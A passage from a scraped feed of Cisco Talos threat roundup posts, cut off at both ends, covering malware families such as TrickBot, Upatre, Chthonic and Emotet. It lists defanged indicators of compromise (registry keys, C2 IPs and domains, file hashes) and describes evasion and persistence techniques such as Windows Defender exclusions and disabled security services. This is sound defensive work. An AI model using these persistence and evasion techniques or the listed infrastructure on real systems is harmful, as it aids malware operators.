\n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config1 ` | 18 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config2 ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ImagePath ` | 12 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: 
C:\\Windows\\SysWOW64\\cvjpowcr ` | 4 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES ` | 3 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\haoutbhw ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\wpdjiqwl ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\mftzygmb ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\unbhgouj ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\ibpvucix ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\exlrqyet ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\tmagfnti ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\lesyxfla ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\slzfemsh ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\yrflksyn ` | 1 \nIP Addresses contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`239[.]255[.]255[.]250` | 18 \n`69[.]55[.]5[.]250` | 18 \n`172[.]217[.]3[.]100` | 18 \n`46[.]4[.]52[.]109` | 18 \n`176[.]111[.]49[.]43` | 18 \n`85[.]25[.]119[.]25` | 18 \n`144[.]76[.]199[.]2` | 18 \n`144[.]76[.]199[.]43` | 18 \n`43[.]231[.]4[.]7` | 18 \n`192[.]0[.]47[.]59` | 18 \n`95[.]181[.]178[.]17` | 18 \n`173[.]194[.]207[.]27` | 16 \n`216[.]146[.]35[.]35` | 15 \n`213[.]205[.]33[.]63` | 14 \n`172[.]217[.]197[.]26` | 14 \n`208[.]76[.]51[.]51` | 13 \n`208[.]76[.]50[.]50` | 13 \n`148[.]163[.]156[.]1` | 12 \n`64[.]233[.]186[.]26` | 12 \n`208[.]71[.]35[.]137` | 11 \n`172[.]217[.]5[.]228` | 11 \n`67[.]231[.]154[.]162` | 11 \n`209[.]85[.]203[.]27` | 11 \n`199[.]5[.]26[.]46` | 10 \n`199[.]5[.]157[.]131` | 10 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`250[.]5[.]55[.]69[.]in-addr[.]arpa` | 18 \n`250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org` | 18 \n`250[.]5[.]55[.]69[.]cbl[.]abuseat[.]org` | 18 \n`250[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net` | 18 \n`whois[.]iana[.]org` | 18 \n`250[.]5[.]55[.]69[.]bl[.]spamcop[.]net` | 18 \n`whois[.]arin[.]net` | 18 \n`250[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org` | 18 \n`microsoft-com[.]mail[.]protection[.]outlook[.]com` | 18 \n`honeypus[.]rusladies[.]cn` | 18 \n`marina99[.]ruladies[.]cn` | 18 \n`sexual-pattern3[.]com` | 18 \n`coolsex-finders5[.]com` | 18 \n`smtp[.]secureserver[.]net` | 15 \n`super-efectindating3[.]com` | 13 \n`ipinfo[.]io` | 12 \n`mx1[.]emailsrvr[.]com` | 12 \n`mx0a-001b2d01[.]pphosted[.]com` | 12 \n`mx-aol[.]mail[.]gm0[.]yahoodns[.]net` | 11 \n`etb-1[.]mail[.]tiscali[.]it` | 10 \n`mta5[.]am0[.]yahoodns[.]net` | 9 \n`mx-eu[.]mail[.]am0[.]yahoodns[.]net` | 9 \n`eur[.]olc[.]protection[.]outlook[.]com` | 9 \n`aol[.]com` | 9 \n`hotmail-com[.]olc[.]protection[.]outlook[.]com` | 9 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- 
\n`%SystemRoot%\\SysWOW64\\config\\systemprofile` | 18 \n`%SystemRoot%\\SysWOW64\\<random, matching '[a-z]{8}'>` | 18 \n`%TEMP%\\<random, matching '[a-z]{8}'>.exe` | 18 \n`%System32%\\<random, matching '[a-z]{8}\\[a-z]{6,8}'>.exe (copy)` | 11 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile:.repos` | 3 \n`%TEMP%\\supvobl.exe` | 1 \n \n#### File Hashes\n\n` 1599aff065e6687acafc61a6f572652d1a0f7a0b17e3a71ca32fe848f2dc2732 1f8ca64991ba709a857f0dcd5bc5d6e9b0885ebc929989f03be3dfb58ecf9ce0 2360e7fb046aff05970dafbb74cdf5544e4699143605d8334772554f50ead3ac 4368a7bb048f1ba83bbd8430b2f49cb566cd69642ed3e9de3675f69533125b29 471c51b4340ed0091aeaf0402f762230689951e448f703033ed4bd1f2fb7a7d6 5195a9a5a3094c3735668216461d2be638152ae0738dab4d8a9295b697bc567c 675f23d881b4685a171767073e01f889ddeb879af7036fde7bcf341f33699da5 8092a1a1db9009435d1177afdef7fb7334e090b8d1b2f5c3e4d121ac0c110cbb 8120184d0a6340d01c5226d28747a2da5c81ef323e126df5a92ff9ada41b5c42 86cf3a207714ea953fb6834643b68064b912c077d44c31b9ed287feab0bc0e4a 8baff9107ff5c48ed53d633fe18f039d3cdd30eedcf05e55b4c467f9f9aed831 9c8275a2d03edd430e8263980a2c31106ab7116e40b93bead7108c6ed97e29fc a3e921ece8ec6a501dbb88c78fea54e2bd15e46b22cb61abced99973c70cf6f8 c2606f0413239f1c60cccd260374e6b88694718af0389be6d173a5c466e7d819 c2a86711660f12b21a7f3fe3fde6b7f07faeb486111d71e34abc27f90f31b415 c94a846dc45a26b4d3869ac32de34aa780720d4cd21743847bb87a2da4a14a8b d7d152e0dc028976050dbace9078c99feddce0f805c1892b4f1ac92feaf5fe15 dae992cf09f4681239e858e69eebfff7e35786069d7719482ccbb15615ec7a7e `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-FJUYMIJ3HFU/XXwD3MVq4qI/AAAAAAAACoU/SMSgo3n1ux812ReEz9X49AwSfQ5W3LFuQCLcBGAsYHQ/s1600/2360e7fb046aff05970dafbb74cdf5544e4699143605d8334772554f50ead3ac_amp.png>)\n\n 
\n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-_0rYDahd9jA/XXwD71mmg_I/AAAAAAAACoY/BTmfuISNl1Aa6qrMKI_f7hcxeoRgQZIFgCLcBGAsYHQ/s1600/2360e7fb046aff05970dafbb74cdf5544e4699143605d8334772554f50ead3ac_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-PkzlZMc8mf0/XXwEEEieQDI/AAAAAAAACoc/YaalBGtdJNMNPYMXCLiLPjMlM2JnUExZQCLcBGAsYHQ/s1600/cc4909f7a73da0a46bdf773459bf92459ec9295f5a1cc433107f94e0b60ba74b_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (7002) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nMadshi injection detected \\- (2740) \nMadshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique. \nKovter injection detected \\- (1860) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware, meaning the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. 
It can detect and report the usage of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nProcess hollowing detected \\- (1503) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nTrickbot malware detected \\- (1131) \nTrickbot is a banking Trojan which appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving over the months since it appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching. \nGamarue malware detected \\- (205) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nInstallcore adware detected \\- (128) \nInstallcore is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware. \nExcessively long PowerShell command detected \\- (95) \nA PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. 
PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats. \nPowerShell file-less infection detected \\- (89) \nA PowerShell command was stored in an environment variable and run. The environment variable is commonly set by a previously run script and is used as a means of evasion. This behavior is a known tactic of the Kovter and Poweliks malware families. \nFusion adware detected \\- (41) \nFusion (or FusionPlayer) is an adware family that displays unwanted advertising in the form of popups or by injecting into browsers and altering advertisements on webpages. Adware is known to sometimes download and install malware. \n \n", "cvss3": {}, "published": "2019-09-13T14:06:47", "type": "talosblog", "title": "Threat Roundup for September 6 to September 13", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-0708"], "modified": "2019-09-13T14:06:47", "id": "TALOSBLOG:2FC8F90E015AB54A7397D49B24BE5B5E", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/GbJCtbTb4Dc/threat-roundup-0906-0913.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-17T23:27:07", "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Jan. 10 and Jan. 17. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. 
\n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats are subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/blogs/1/2020/01/tru.json_.txt>) that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness. \nThe most prevalent threats highlighted in this roundup are: \n \nThreat Name | Type | Description \n---|---|--- \nWin.Trojan.Chthonic-7516291-1 | Trojan | Chthonic is a banking trojan derived from the Zeus family of banking malware. It is typically spread via phishing emails and attempts to steal sensitive information from an infected machine. Chthonic has also been observed downloading follow-on malware such as Azorult, another information stealer. \nWin.Dropper.Upatre-7524255-0 | Dropper | Upatre is a malicious downloader often used by exploit kits and phishing campaigns. Upatre downloads and executes malicious executables, such as banking malware. \nWin.Malware.TrickBot-7524669-1 | Malware | Trickbot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts. 
\nDoc.Dropper.Emotet-7540598-0 | Dropper | Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails. Talos recently discovered an uptick in Emotet distribution. For more, click [here](<https://blog.talosintelligence.com/2020/01/stolen-emails-reflect-emotets-organic.html>). \nWin.Packed.njRAT-7532636-1 | Packed | njRAT, also known as Bladabindi, is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes and remotely turn on the victim's webcam and microphone. njRAT was developed by the Sparclyheason group. Some of the largest attacks using this malware date back to 2014. \nWin.Malware.Cerber-7533438-1 | Malware | Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension \".cerber,\" although in more recent campaigns other file extensions are used. \nWin.Packed.Barys-7532466-0 | Packed | This is a trojan and downloader that allows malicious actors to upload files to a victim's computer. \nWin.Packed.Razy-7532659-0 | Packed | Razy is often a generic detection name for a Windows trojan. It collects sensitive information from the infected host, encrypts the data, and sends it to a command and control (C2) server. Information collected might include screenshots. The samples modify auto-execute functionality by setting and creating a value in the registry for persistence. \nWin.Packed.Dridex-7532883-1 | Packed | Dridex is a well-known banking trojan that aims to steal credentials and other sensitive information from an infected machine. 
\n \n* * *\n\n## Threat Breakdown\n\n### Win.Trojan.Chthonic-7516291-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: Hidden ` | 11 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM \nValue Name: EnableLUA ` | 11 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: Start ` | 11 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: Start ` | 11 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: ShowSuperHidden ` | 11 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS \nValue Name: Start ` | 11 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: Start ` | 11 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WUAUSERV \nValue Name: Start ` | 11 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 2827271685 ` | 11 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: TaskbarNoNotification ` | 11 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: TaskbarNoNotification ` | 11 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: HideSCAHealth ` | 11 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: HideSCAHealth ` | 11 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN ` | 11 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: 2827271685 ` | 11 \nMutexes | Occurrences \n---|--- \n`Frz_State` | 11 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`40[.]91[.]124[.]111` | 11 \n`208[.]100[.]26[.]245` | 11 \n`40[.]67[.]189[.]14` | 5 \n`20[.]45[.]1[.]107` | 5 \n`40[.]90[.]247[.]210` | 2 \nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`www[.]update[.]microsoft[.]com[.]nsatc[.]net` | 11 \n`trokelnopartunofroner[.]com` | 11 \n`mplusworldofficeupdates[.]com` | 11 \n`imaginyourselfuafe[.]com` | 11 \n`ltdcommprovvetverify[.]com` | 11 \n \n#### File Hashes\n\n` 085b7d3df5bdf13484ad58dc9b34431a98117f0d267ac3aba91cfc0b384ea35f 11185553d3e040f23efc0b0d1a9f0dc813e76cdb84174efcc785193c6d525535 149e6ff5bb2d0d3abdc7fabd4e3f6be1c563e4b57e035ee30b71a7d04c02ef8f 6fb1c35d7c0cf7f33a162c4c4eb99d6c5866880318db7781a34d9e005264985e 72c636ace54abacf4eb3e6e3a4c695e6c2c160dc6097666b249df34f46489b97 7ccdcf694abe81e19e7afc091d2b614872695e6cd9d90abab21622689bf5555d 8549f3a0383c7d65c869c0eba84960011afe71eb501eb90921066992f0b03833 9116b4c639cedb801e6b9a4891cf5af8e61a7d2f1e54390858f0f5e63dff8f42 9b3ad135a115671e8c960f353dd1805a6bbcedb2f9bf866f366bd9410a601862 e03e7f3f2d272bb18bfd138006cadf905b0fd45028327a3ec556ef1cba7c96fc e8da03e309d09fbe36a215769cf0f4b3f8b93cbf3137db0d4db77ce4bde4e534 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n* * *\n\n### Win.Dropper.Upatre-7524255-0\n\n#### Indicators of Compromise\n\nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`91[.]211[.]17[.]201` | 28 \n`173[.]216[.]240[.]56` | 27 \n`38[.]124[.]169[.]187` | 27 \n`188[.]231[.]34[.]130` | 27 \n`176[.]108[.]102[.]76` | 27 \n`104[.]20[.]17[.]242` | 19 \n`104[.]20[.]16[.]242` | 8 \n`174[.]96[.]234[.]86` | 1 \n`69[.]77[.]155[.]3` | 1 \n`38[.]124[.]169[.]178` | 1 \n`38[.]123[.]202[.]3` | 1 \nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`icanhazip[.]com` | 28 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\PRTY8D97.txt` | 27 \n`%TEMP%\\prityviewer.exe` | 27 \n`%TEMP%\\scsiAFCF.log` | 1 \n`%TEMP%\\scsvii.exe` | 1 \n \n#### File Hashes\n\n` 00592846d2880dfa06ea2bb489b90c1a626bc62664e6933cbcb163cea32e1b70 006c6f0e053a633347afb8e2dc1c5f9a3c732fe654844b32c8efa7fb1b6929f7 0105ed02beac29702244d7f1f2b727d3c53e49590626773e5eefb154d626e469 0120db2a1e9c321da2c654f924c48d44f8db9c32e5cecf62f782e5fd3750ed6d 01a44cd682b97252135d9afb72061db7e8ceb87530de59b081bc13481492dbe5 01d5a8081730c45cd3c16bed3572ac37f767422435975961e783eada059f9f57 0246b510696d6e82f4ef63bd567d00fde0b1a5d8c84b5461a53003c9dbf0a507 0293c190511688dd93a031763139557febc330bb1800334e37d14d0c63ecd466 0349359919a3db6665112c77b8687ad370dfb99bd592a8af0efd7fb32e94d9c4 03b212420fccffb3f96bdb68c7952c408ea8e36d0333d8e63048f8d086a88eec 0437d8df6d2cd8b97959b30c2bf8d875ca3832c055e7f26777459f6db0ccd451 04ab31cd4de8cb6313b676c2e511e3ac477c44dcfe9cfe4a62cf77ce81b1e1a3 04f9d97774c2545c681c1463aa5abcd09355e54345bb03e7cc4105ba1ed7303c 052e7d7d29ebb25c5ab42b7262ae657e20f727c48d63f1223503e3f03daa49ad 05f64082854e6332a3ca42f5b25b8c79569f0b03b84568f26bf997efdd334eec 0607df27c26a55485cfdd78c25ca4b02ff5ebdcde2f3bd5b9265eb366e94b6a5 064cb169eae962f176d84cf3ef074871410ca3bab11bf23ce64df46e036a5b7f 0669e65c645527ae11a544a4eea34fd7d4eb7e33a73b26b6dba3399e083b36c8 07ed2f34b113fb661022915db582d15f13c3734fe6ddda2ada51464f7213f192 09239e11b17a303b9e5f02bdd6b1fcf3fdd54de6ff94b3c49bec7b3230548673 092c3f850fa506c6439ac87a9107a0b5504c0025199d7fac8961c01f873adf82 094adba281d8f8a02207f46f90d4c284ce4f1ba47f1fce53d95a068017e9c159 0970d4111acc10bf407b0babfee1c184a604e6be22318f0474afdf50b26daa33 097bea67fb8fcc721538a887ac5a4c9214489cb7c61b278b2db997c17fc51442 0b291d9eebdd2055da99fd4bc56baad1ba06d87aae0e66e7ddfe9c23953c3a29 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  
\nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-tFLQHAh04jA/XiIv-alPsnI/AAAAAAAADIA/YQHu-15yj2IcIM5BU1P_Xq7WqDkfpltSwCLcBGAsYHQ/s1600/05f64082854e6332a3ca42f5b25b8c79569f0b03b84568f26bf997efdd334eec_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-_MB17XvKgAQ/XiIwDdh8QaI/AAAAAAAADIE/7YvZnFUTfFUife4Iwu915aR7Eh9iutLyACLcBGAsYHQ/s1600/67e646b44748b8bfae88076e4a1e00cf3f12b827836ff86392d63e709552f3b7_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.TrickBot-7524669-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\V1-TZEVE4 ` | 1 \n`<HKCU>\\SOFTWARE\\V1-TZEVE4 \nValue Name: exepath ` | 1 \n`<HKCU>\\SOFTWARE\\V1-TZEVE4 \nValue Name: licence ` | 1 \nMutexes | Occurrences \n---|--- \n`Global\\316D1C7871E10` | 41 \n`Remcos_Mutex_Inj` | 1 \n`v1-TZEVE4` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`188[.]120[.]254[.]68` | 17 \n`78[.]24[.]223[.]88` | 12 \n`198[.]23[.]209[.]201` | 11 \n`185[.]177[.]59[.]163` | 11 \n`5[.]182[.]210[.]109` | 10 \n`181[.]113[.]28[.]146` | 9 \n`164[.]68[.]120[.]60` | 8 \n`185[.]213[.]20[.]246` | 7 \n`195[.]123[.]220[.]178` | 7 \n`181[.]112[.]157[.]42` | 6 \n`146[.]185[.]253[.]191` | 5 \n`5[.]2[.]70[.]145` | 5 \n`188[.]165[.]62[.]34` | 5 \n`185[.]141[.]27[.]190` | 4 \n`69[.]195[.]159[.]158` | 3 \n`181[.]129[.]104[.]139` | 3 \n`45[.]137[.]151[.]198` | 3 \n`51[.]89[.]115[.]124` | 3 \n`172[.]82[.]152[.]11` | 3 \n`172[.]217[.]9[.]243` | 2 \n`52[.]55[.]255[.]113` | 2 \n`190[.]214[.]13[.]2` | 2 \n`181[.]140[.]173[.]186` | 2 \n`45[.]125[.]1[.]34` | 2 \n`79[.]174[.]12[.]245` | 2 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`checkip[.]amazonaws[.]com` | 4 \n`wtfismyip[.]com` | 3 \n`www[.]myexternalip[.]com` | 2 \n`api[.]ip[.]sb` | 2 \n`api[.]ipify[.]org` | 2 \n`250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org` | 1 \n`myexternalip[.]com` | 1 \n`icanhazip[.]com` | 1 \n`ipinfo[.]io` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\<random, matching '[A-F0-9]{4,5}'>.dmp` | 42 \n`%TEMP%\\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt` | 42 \n`%APPDATA%\\DirectTools\\data` | 31 \n`%System32%\\Tasks\\Direct Tools Update` | 31 \n`%APPDATA%\\DirectTools\\settings.ini` | 31 \n`%APPDATA%\\DirectTools` | 31 \n`%APPDATA%\\DIRECTTOOLS\\<original file name>.exe` | 31 \n`%APPDATA%\\gpuhealth` | 10 \n`%System32%\\Tasks\\Task Gpu health` | 10 \n`%APPDATA%\\gpuhealth\\data` | 10 \n`%APPDATA%\\gpuhealth\\settings.ini` | 10 \n`%APPDATA%\\GPUHEALTH\\<original file name>.exe` | 10 \n`%APPDATA%\\DirectTools\\Data\\pwgrab64` | 2 \n`%System32%\\Tasks\\shadowdev` | 1 \n`%APPDATA%\\DirectTools\\data\\pwgrab64_configs` | 1 \n`%APPDATA%\\DirectTools\\data\\pwgrab64_configs\\dpost` | 1 \n \n#### File Hashes\n\n` 0267975d981105107f8003e7a84490d0871017449352a72ecf010ee3639d99b7 0eae61f5dde95c34cf6e6a225a55c8b34ad0149b4c92c96cac7e1dd67d7423d5 1100664b904de4aaeab06a193bb1f0d6e57f0ff0407a2a836e592751ebfac142 12707680fc20d5ed8f75ee6591f81c334a096c96d6866d1ac4caa719fc55ddbc 1c63d9a293d05e5f598a169969ffd39ba0739e17740ba5205323cfa9b2a692dd 209ee235c5ae5b120a8aca752b365519aa91531ef806ed32741f7058b4c4c4fa 2b952b15f735ae3852a5b1add3dfd56b51217b073064f3cccea83b145f3e2f09 2ea8f522a5a55daafca651634e4f269f4fe7e42f222bd92f732e8c3695667c69 2eb32d3912f7e2bff7827040a76cb5b4bee6e56cec7a09b751fbc04085cf87bd 324b9688d45acf12410b42e8ce2532f5a1d077361e905c9ef69bbc812d24a01f 43de46a37c7dc56a5919babc661e2fcfcd611f1d3ff92dbdcd5a61bfeea9b79f 4ab4a600b2c75dfda7438714bc6a2cc87123b95f21372bcdcf5aa33ff73dac74 
4c2fdeacf1fccac0fcdc064a5ae38065950531b7f03c2c40b5068379a591394d 4ecc86000dcc587fdf491e6589961d9523b33aa85533f61638278f8f1fd537df 539e39809bcc3ace9256394c5ce3e7626c242d4580c3a15d0a1cc5eab75b4b9f 58b8be166449de4ea71a103e65d7c45e52cc8d6bd95ac0787eecfe8dd12f980f 5cbb5ace573160c815b2e56d85e8bf5092be22887f23e28af9c6fe3fef7039ab 6f1468021e0606d3021c19630e0bd05eb721111f00c2d203efae6bf23f617a1b 75d658a651fa2fdba6930d2a6b6d2ce7491a4b87d214eb830ea3f23cd329c011 76c73a2c8f85847cb72a1ddfe56a3e728598c3a47c94cce44bd9967237039ef5 7d45d177e653e36ae3fb598b0d17acc4895795712fa53c3deb5ba4137b30e73c 7ea58adcd3598f10aa2e81557b20e52db1ef0c89071c28cdc5143af8f9ec02be 87ad53b54453925c0ced0e0f71bbbec7ba9b08afb2f827642dc55e86c0dcb8e9 8b50aa0fc83663e01ddbd06ae779ea3fdf30eaa1a63d6ad385fdca3ec17fd6cc 8b8a7b9fdb397a75cd51d720e32aebc016b2b1947478311f39929a9a43de81b9 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-nfk0oWsee6k/XiIwVfUpWCI/AAAAAAAADIQ/B8NTF6nYtY0ggcurky6zfiHmqc1TjJOYwCLcBGAsYHQ/s1600/5cbb5ace573160c815b2e56d85e8bf5092be22887f23e28af9c6fe3fef7039ab_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-vMxVZpIFnos/XiIwZo1_lsI/AAAAAAAADIU/sq109bklsWQRVTS3Vvum6S3rSu9aVTX0wCLcBGAsYHQ/s1600/5cbb5ace573160c815b2e56d85e8bf5092be22887f23e28af9c6fe3fef7039ab_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Doc.Dropper.Emotet-7540598-0\n\n#### Indicators of 